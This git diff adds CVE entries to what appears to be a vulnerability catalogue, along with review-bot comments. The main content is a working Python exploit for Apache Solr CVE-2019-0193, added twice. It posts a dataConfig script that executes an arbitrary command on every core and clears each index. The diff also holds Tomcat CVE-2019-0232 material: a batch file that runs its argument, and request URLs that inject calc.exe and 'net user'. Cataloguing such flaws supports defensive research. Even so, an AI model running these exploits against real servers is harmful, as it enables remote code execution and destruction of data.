diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..aa875acf80c112f9f10a05dd45e6eda6dc45647c
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..d0f2a7b2f3d2848805171cb89e320a9e23b8cdf8
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,92 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+ _______ ________ ___ ___ __ ___ ___ __ ___ ____
+ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \
+ | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ <
+ | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) |
+ \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/
+
+ python By jas502n
+
+'''
+print banner
+
+def admin_cores(url, cmd):
+ core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+ r = requests.get(url=core_selector_url)
+ json_strs = json.loads(r.text)
+ if r.status_code ==200 and "responseHeader" in r.text:
+ print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+ for core_selector in json_strs['status']:
+ jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+ print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+ show_config(url,jas502n_Core_Name)
+ get_config_name(url,jas502n_Core_Name)
+ URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+
+ else:
+ print "No core_selector Exit!"
+
+
+
+
+def show_config(url,jas502n_Core_Name):
+ config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+ r1 = requests.get(config_url)
+
+ if r1.status_code ==200 and 'dataConfig' in r1.text:
+ print ">> config_url= %s"% config_url
+ print ">%s dataConfig Exit!" % jas502n_Core_Name
+ else:
+ print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+ get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+ r2 = requests.get(get_config_url)
+ if r2.status_code ==200 and 'config' in r2.text:
+ print ">> get_config_url= %s" % get_config_url
+ r2_json = json.loads(r2.text)
+ r2_str = r2_json['initArgs']
+
+ print '>get_config_name= %s' % r2_str[1][1]
+
+ else:
+ print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+ debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+ payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ "Content-type":"application/x-www-form-urlencoded",
+ "X-Requested-With":"XMLHttpRequest",
+ "Referer":"http://%s/solr/" % url
+
+ }
+ r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+ print ">>>>> debug_model_url= %s" % debug_model_url
+ if r3.status_code ==200 and 'Requests' in r3.text:
+
+ print "Send Poc Success!"
+ else:
+ print "No Send Poc Success!"
+ print r3.text
+
+
+
+if __name__ == '__main__':
+ cmd = sys.argv[2]
+ url = sys.argv[1]
+ admin_cores(url,cmd)
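Review bot: The file has no module docstring, and two things a reader needs before running it in a lab are only visible by decoding the `payload` string in `URLDataSource_Poc`: the request is a `full-import` with `clean=true&commit=true`, which as far as I can tell from the DIH parameters clears and commits each core's index, and `admin_cores` sends it to every core the server lists, not just one. A docstring should state that, plus that the script is Python 2 only (`print banner`), that it takes the base URL and the command as `sys.argv[1]` and `sys.argv[2]`, and that from Solr 8.2.0 the `dataConfig` parameter is honoured only when `enable.dih.dataConfigParam` is set, as the YAML entry in this commit says. The identical blob is added again under `cve/apache/2019/CVE-2019-0193/`; the same point applies there, and one copy would be enough.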
diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c4089bff912f20a42b27efdb52c547074cf39fc6
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/README.md
@@ -0,0 +1,62 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+
+### python usage
+
+`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`
+
+### URLDataSource_Poc
+
+
+
+```
+
+
+
+
+
+
+
+```
+
+### jdbc
+
+
+
+
+`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`
+
+```
+
+
+
+
+
+
+
+
+```
+
+### 参考链接:
+https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
+
+https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
+
diff --git a/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ad7c57a5d58a5fe9c89e59aff20b2ed5bd114342
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9335021e72e223033049bacc1b0da8b464389ebe
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif b/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif
new file mode 100644
index 0000000000000000000000000000000000000000..6ac1f21965724e51abc5adac3b034c172449a700
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif differ
diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193 b/cve/apache-solr/2019/yaml/CVE-2019-0193
new file mode 100644
index 0000000000000000000000000000000000000000..16d30f2d1c248b46cf1be91f5b04591df1df3c2d
--- /dev/null
+++ b/cve/apache-solr/2019/yaml/CVE-2019-0193
@@ -0,0 +1,19 @@
+id: CVE-2019-0193
+source: https://github.com/jas502n/CVE-2019-0193
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: high
+ description:
+ 在Apache Solr中,DataImportHandler是一个可选但流行的模块,用于从数据库和其他来源提取数据,它具有整个DIH配置可以来自请求的“dataConfig”参数的功能。DIH 管理屏幕的调试模式使用它来方便地调试/开发 DIH 配置。由于 DIH 配置可以包含脚本,因此此参数存在安全风险。从 Solr 版本 8.2.0 开始,使用此参数需要将 Java 系统属性“enable.dih.dataConfigParam”设置为 true。
+ scope-of-influence:
+ Apache Solr < 8.2.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2019-0193
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache, Solr
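Review bot: The entry is added as `cve/apache-solr/2019/yaml/CVE-2019-0193` with no `.yaml` extension, while the other entries in this commit have one (`CVE-2019-0232.yaml`, `cve/apache/2019/yaml/CVE-2019-0193.yaml`), so anything that selects entries by extension will likely skip it. The same CVE is described a second time under `cve/apache/2019/yaml/`, with `source` as a list there and a scalar here; keep one entry and one shape. `info.name` holds a description of the product rather than a name for the vulnerability, for example `name: Apache Solr DataImportHandler dataConfig remote code execution`. The affected range here (`Apache Solr < 8.2.0`) also disagrees with the README title in this commit (`< solr v8.12`), and one of the two should be corrected.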
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/README.md b/cve/apache-tomcat/2019/CVE-2019-0232/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c47c7405abb839a6e1efcb1c9eb9dd75d634b2ff
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/README.md
@@ -0,0 +1,64 @@
+#### Vulnerability Environment
+```
+Tomcat 8.5.39
+
+Jdk 8u121
+```
+
+#### Edit `web.xml` file
+```
+
+ cgi
+ org.apache.catalina.servlets.CGIServlet
+
+ debug
+ 0
+
+
+ cgiPathPrefix
+ WEB-INF/cgi-bin
+
+
+ executable
+
+
+ 5
+
+
+
+
+
+ cgi
+ /cgi-bin/*
+
+```
+
+#### Edit `content.xml` file
+```
+
+
+
+
+ WEB-INF/web.xml
+ ${catalina.base}/conf/web.xml
+
+
+
+
+```
+
+#### Create `hello.bat` file
+```
+echo Content-type: text/html //whatever the content in batch file
+```
+
+#### Move the directory `WEB-INF` to `$CATALINA_HOME/webapps/ROOT` and then restart tomcat server
+
+#### Send a request to the target tomcat server with Windows OS command injection
+```
+http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe
+
+http://localhost:8080/cgi-bin/hello.bat?&net+user
+```
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat
new file mode 100644
index 0000000000000000000000000000000000000000..c9601a16aca152a1a54a316ea6b319f0da0652c9
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat
@@ -0,0 +1,5 @@
+@echo off
+echo Content-Type: text/plain
+echo.
+set foo=%~1
+%foo%
\ No newline at end of file
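Review bot: The fixture carries no comment, and it differs from the `hello.bat` shown in this commit's README, which is a single `echo Content-type: text/html` line. This version copies the first argument into `foo` and runs it with `%foo%`, so the script executes its argument by design rather than only demonstrating the JRE argument-passing flaw the YAML entry describes. Say which of the two is intended and document it at the top of the file, e.g. `rem Lab fixture for CVE-2019-0232: expands the first CGI argument and runs it as a command.` The file also ends without a trailing newline.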
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml
new file mode 100644
index 0000000000000000000000000000000000000000..fae48ddde0c4612bd96386709e0cdd252bf93cc8
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml
@@ -0,0 +1,31 @@
+
+
+
+
+
+ Welcome to Tomcat
+
+ Welcome to Tomcat
+
+
+
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif b/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif
new file mode 100644
index 0000000000000000000000000000000000000000..46a9c5ad6a0f64e4d88946527d3137ca9f359061
Binary files /dev/null and b/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif differ
diff --git a/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml b/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..80afaf0bdd2e298ef96573afbaf2528dee5e76bc
--- /dev/null
+++ b/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml
@@ -0,0 +1,21 @@
+id: CVE-2019-0232
+source: https://github.com/pyn3rd/CVE-2019-0232
+info:
+ name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
+ severity: high
+ description: |
+ 在启用 enableCmdLineArguments 的 Windows 上运行时,Apache Tomcat 9.0.0.M1 到 9.0.17、8.5.0 到 8.5.39 和 7.0.0 到 7.0.93 中的 CGI Servlet 容易受到远程代码执行的攻击,因为 JRE 将命令行参数传递给 Windows 的方式存在错误。默认情况下,CGI Servlet 处于禁用状态。CGI 选项 enable CmdLineArguments 在 Tomcat 9.0.x 中默认处于禁用状态(默认情况下,为了响应此漏洞,将在所有版本中禁用)。有关 JRE 行为的详细说明,请参阅 Markus Wulftange 的博客(https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html)和此存档的 MSDN 博客 (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/)。
+ scope-of-influence:
+ Apache Tomcat 7.0.0-7.0.93
+ Apache Tomcat 8.5.0-8.5.39
+ Apache Tomcat 9.0.1-9.0.17
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0232
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2019-0232
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache Tomcat
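Review bot: `scope-of-influence` gives the 9.0 range as `Apache Tomcat 9.0.1-9.0.17`, but the `description` just above says 9.0.0.M1 to 9.0.17, so the milestone builds fall out of the affected range; it should read `Apache Tomcat 9.0.0.M1-9.0.17`. The three ranges are written as bare continuation lines, which YAML folds into a single string if they are plain scalars (the indentation is not visible here); `- ` list items would keep them separate. The description also spells the option once as `enable CmdLineArguments`, with a space.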
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4 b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4
new file mode 100644
index 0000000000000000000000000000000000000000..aca9e95bd96b9f7618fd41e9731ae80765f7a96c
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4 differ
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..aa875acf80c112f9f10a05dd45e6eda6dc45647c
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..d0f2a7b2f3d2848805171cb89e320a9e23b8cdf8
--- /dev/null
+++ b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,92 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+ _______ ________ ___ ___ __ ___ ___ __ ___ ____
+ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \
+ | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ <
+ | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) |
+ \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/
+
+ python By jas502n
+
+'''
+print banner
+
+def admin_cores(url, cmd):
+ core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+ r = requests.get(url=core_selector_url)
+ json_strs = json.loads(r.text)
+ if r.status_code ==200 and "responseHeader" in r.text:
+ print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+ for core_selector in json_strs['status']:
+ jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+ print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+ show_config(url,jas502n_Core_Name)
+ get_config_name(url,jas502n_Core_Name)
+ URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+
+ else:
+ print "No core_selector Exit!"
+
+
+
+
+def show_config(url,jas502n_Core_Name):
+ config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+ r1 = requests.get(config_url)
+
+ if r1.status_code ==200 and 'dataConfig' in r1.text:
+ print ">> config_url= %s"% config_url
+ print ">%s dataConfig Exit!" % jas502n_Core_Name
+ else:
+ print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+ get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+ r2 = requests.get(get_config_url)
+ if r2.status_code ==200 and 'config' in r2.text:
+ print ">> get_config_url= %s" % get_config_url
+ r2_json = json.loads(r2.text)
+ r2_str = r2_json['initArgs']
+
+ print '>get_config_name= %s' % r2_str[1][1]
+
+ else:
+ print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+ debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+ payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ "Content-type":"application/x-www-form-urlencoded",
+ "X-Requested-With":"XMLHttpRequest",
+ "Referer":"http://%s/solr/" % url
+
+ }
+ r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+ print ">>>>> debug_model_url= %s" % debug_model_url
+ if r3.status_code ==200 and 'Requests' in r3.text:
+
+ print "Send Poc Success!"
+ else:
+ print "No Send Poc Success!"
+ print r3.text
+
+
+
+if __name__ == '__main__':
+ cmd = sys.argv[2]
+ url = sys.argv[1]
+ admin_cores(url,cmd)
diff --git a/cve/apache/2019/CVE-2019-0193/README.md b/cve/apache/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c4089bff912f20a42b27efdb52c547074cf39fc6
--- /dev/null
+++ b/cve/apache/2019/CVE-2019-0193/README.md
@@ -0,0 +1,62 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+
+### python usage
+
+`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`
+
+### URLDataSource_Poc
+
+
+
+```
+
+
+
+
+
+
+
+```
+
+### jdbc
+
+
+
+
+`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`
+
+```
+
+
+
+
+
+
+
+
+```
+
+### 参考链接:
+https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
+
+https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
+
diff --git a/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ad7c57a5d58a5fe9c89e59aff20b2ed5bd114342
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9335021e72e223033049bacc1b0da8b464389ebe
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/solr_RCE.gif b/cve/apache/2019/CVE-2019-0193/solr_RCE.gif
new file mode 100644
index 0000000000000000000000000000000000000000..6ac1f21965724e51abc5adac3b034c172449a700
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/solr_RCE.gif differ
diff --git a/cve/apache/2019/yaml/CVE-2019-0193.yaml b/cve/apache/2019/yaml/CVE-2019-0193.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b9af4c21e28fa1d34762c85770a145948f4f71cd
--- /dev/null
+++ b/cve/apache/2019/yaml/CVE-2019-0193.yaml
@@ -0,0 +1,20 @@
+id: CVE-2019-0193
+source:
+ - https://github.com/jas502n/CVE-2019-0193
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: high
+ description: 在Apache Solr中,DataImportHandler是一个可选但流行的模块,用于从数据库和其他来源提取数据,它具有整个DIH配置可以来自请求的“dataConfig”参数的功能。DIH 管理屏幕的调试模式使用它来方便地调试/开发 DIH 配置。由于 DIH 配置可以包含脚本,因此此参数存在安全风险。从 Solr 版本 8.2.0 开始,使用此参数需要将 Java 系统属性“enable.dih.dataConfigParam”设置为 true。
+ scope-of-influence:
+ Apache Slor < 8.2.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193#range-6854850
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2019-0193
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache,Solr
\ No newline at end of file
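Review bot: `scope-of-influence` misspells the product as `Apache Slor < 8.2.0`, which defeats any product-name matching against this entry; it should be `Apache Solr < 8.2.0`. This file also describes the same CVE as `cve/apache-solr/2019/yaml/CVE-2019-0193` added earlier in the commit, with `source` as a list here and a scalar there. The `reference` URL carries a page fragment that can be dropped, leaving `- https://nvd.nist.gov/vuln/detail/CVE-2019-0193`.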
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index e348ad077a31411bdce499c500ea5c64cd291a07..fc49cadd072bfed150b0cdc61afbbd9762a3bd46 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -21,6 +21,7 @@ cve:
- CVE-2022-29885
- CVE-2020-9484
- CVE-2020-1938
+ - CVE-2019-0232
apache-Spark:
- CVE-2022-33891
apache-Flink:
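Review bot: Only `- CVE-2019-0232` is registered in this hunk, although the commit also adds CVE-2019-0193 material under both `cve/apache-solr/2019/` and `cve/apache/2019/`. Unless a Solr entry already exists in a part of the file not shown here, that CVE stays out of the index. If this list is what drives the catalogue, add `- CVE-2019-0193` under the matching Solr key. The key that the new line falls under starts above the hunk, so its placement cannot be confirmed from here.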